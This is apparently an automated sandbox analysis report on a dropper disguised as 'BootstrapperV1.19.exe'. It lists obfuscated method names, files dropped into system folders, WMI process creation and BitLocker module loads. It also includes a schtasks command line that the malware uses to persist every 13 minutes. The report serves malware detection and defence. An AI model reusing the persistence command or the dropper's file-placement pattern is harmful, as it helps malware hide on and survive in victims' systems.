Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, YNGwJqSeY8kjoKUU1l6.cs	High entropy of concatenated method names: 'PAsSShSJqL', 'wVYS8AVjhb', 'P25SgMATsr', 'fbiS7Xj0lo', 'QT8SZWH5q2', 'LVHU3edKak4k3WE5SxPf', 'S2PQlsdKXGwJBqCsJyua', 'lN9IeZdKQS3uJOXK3sVm', 'fxnfCadKxiL0UFMW6iYR', 'uQ6JAxdKzDfbGap1xV4C'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, xCO2BB5nJVkEtQqDNLH.cs	High entropy of concatenated method names: 'VZld96dNwyfP0XEsZW8o', 'HdWU7VdN2noavTH0Ughg', 'hRZD7pdNiUFeQPQmOYgg', 'SjiSSqdNdluu7lRwLbGQ', 'xmPP3JdLQeIQjlEpaQM9', 'Ux5jcqdLaVE2qKyZw5N2', 'ABK9LQdLxbhR5Zy6Qtv0', 'HhhJP7dLNpY3grvB3HOd', 'RABrktdLX80jWEZ7GswM'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, UD4mFCGAo7vb0RxfmUt.cs	High entropy of concatenated method names: 'GWrGWAW1F8', 'Hueafbd02PlYMhxcK7gs', 'u61PQ3d0JNTj88gWatox', 'MHtCYMd0GNVE2RAwR5q8', 'MKsTQBd0c1kM5IYiY8Lc', 'U1J', 'P9X', 'VekdJ647Dmw', 'GjLdJb2Jcuk', 'lB0dlkKv4pN'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, j71P4oefSb4Iv6t4d2y.cs	High entropy of concatenated method names: 'vMUeTpgKMB', 'mapeqoQpeg', 'ly9evXavH4', 'bI5eh189Zm', 'quZeFQ02mB', 'NYFe6YSFnu', 'MhFeblqJkt', 'q9ketDIxAM', 'bYaeuN6v3m', 'VegeRrZaCf'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, q09YkfdxV56aurjHkcj.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'JnOdldkrKGw', 'RdIdJdHUcs6', 'VxshPjd7i4HiT08bcDmm', 'DZsASfd7dQt9gIlh9dqZ', 'hTjYBvd7wQheaIPOZNl6', 'kCsgTed72snWpqfej6by'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, rqXwHswGHI7vPCkdsB9.cs	High entropy of concatenated method names: 'jGWwk9xhxL', 'GF3wlTa1j2', 'bRQwMOeac7', 'xsXwfqej8S', 'VPhhvrd76hjhD1mrpp4k', 'k6lPEPd7hUJjYutLgFSH', 'OvYk1Dd7FMWLMPX8mtRL', 'Ue6IcGd7brB2mfjN6oA6', 'yXnoqpd7ticXM6mWjB3e', 'LrrPFCd7uALdyLhwHIPY'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, P1ALIswj8p6Y5vEnri1.cs	High entropy of concatenated method names: 'AUSwIU17wQ', 'MIZwpytAfE', 'Pk4PIxd7Z8Zumx7kcfTQ', 'tWcsGGd7gIFesXqItuRJ', 'TkoQbId77OZWjXO7VE3p', 'nfDQSBd7YhxExHha7bpI', 'v2f6Hpd7TCiY9VJUxAjC', 'KX2sJCd70FXPsY3LLZSi', 'A9FtR5d74tTCpZmhtv6t'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, LlLKQn71aVmc9JVx6ss.cs	High entropy of concatenated method names: 'fm07LtW1Ee', 'PLW7NjNorw', 'PXN7X2oKeL', 'oIN7QN0FfI', 'syN7aW7rlt', 'p1BfR7dBNONJlPyDtyEQ', 'GQdKZ3dBDHJWrlMu4tG6', 'eAsm1ydBLnGNXnmZ4BT0', 'SdAtaDdBX1PFdvIwq1OZ', 'HI2H0edBQjFgDYrGlSyR'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, bNTRJ3srWwX2TLEWO1h.cs	High entropy of concatenated method names: 'YT6bwfd1FNj2CLVWSewq', 'PmGBlCd1vEGTv4qedXcJ', 'cU47t1d1hr4l97cCaMQN', 'nXlJUfd16BxFgBXQxyIP', 'KAas1HcMla', 'Mh9', 'method_0', 'J2AsDwc4Bd', 'hjXsLSEiWT', 'OV9sNR7syA'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, Ca29H4wrWuOnYGI7ufA.cs	High entropy of concatenated method names: 'RAc2kXnqD3', 'gmIqkKdZ2QxfJL9a4hGB', 'K9qDYwdZJJ33EK1XuPVg', 'bjDQiYdZGuwoev0o7J9l', 'mExsJgdZcyh9Hvsv5Db2', 'hGacMIdZdSq0xDhpyWS9', 'WXjbFsdZweENJi62S7Yu', 'nSDIvEdZkIPraT1wcqvO', 'olI2ifJwVJ', 'Def2wDRTab'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, W0oqHaYJi0X4y3dgfHf.cs	High entropy of concatenated method names: 'kgyYcSeyMr', 'xoXYk0iCH1', 's9QYlOip6B', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'uUbYMyOABu'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, qO2H4fJ0BQS3WXlNP0W.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'JMKdlJ6cXUF', 'RdIdJdHUcs6', 'L79Eg1dYnuhUk3dbgb01', 'dxEyxLdY3Sf36lQ4Rlu5', 'Qb9abSdYmY9DiKsM61NT', 'LlWriqdYCCZufZWejjBy', 'OFvJRbdYVYfVCEdpGS2Q'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, D3KXRsDmtylPWFs6gBf.cs	High entropy of concatenated method names: 'eZudl8U33TV', 'g9EdcSg6qtI', 'cS887ydXpyrmfd1M0Jm7', 'ppfiUGdXycx4xRAlo8KY', 'pXWOTedXIZVpTAZYnuHM', 'J4kaZudXeKJSZIeVhIPX', 'q3LKeLdXSjN4bmL7Ho2Y', 'MgEdAadX8iXoI2ebN1U5', 'imethod_0', 'g9EdcSg6qtI'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Users\user\Desktop\QWdDhtsw.log	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File created: C:\Users\user\Desktop\wLNGnQCR.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Windows\ELAMBKUP\SIHClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	File created: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File created: C:\Users\user\Desktop\FtgWXsHz.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Users\user\Desktop\qHDXlZnr.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Users\user\Desktop\nFQoPqiw.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	File created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File created: C:\Users\user\Desktop\gjQRaIsv.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Users\user\Desktop\GnKnxRmO.log	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File created: C:\Users\user\Desktop\VMFLzOzY.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Users\Default\AppData\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	File created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe

File created: C:\Windows\ELAMBKUP\SIHClient.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Users\user\Desktop\nFQoPqiw.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Users\user\Desktop\qHDXlZnr.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Users\user\Desktop\QWdDhtsw.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File created: C:\Users\user\Desktop\GnKnxRmO.log	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File created: C:\Users\user\Desktop\VMFLzOzY.log	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File created: C:\Users\user\Desktop\gjQRaIsv.log	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File created: C:\Users\user\Desktop\FtgWXsHz.log	Jump to dropped file
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File created: C:\Users\user\Desktop\wLNGnQCR.log	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
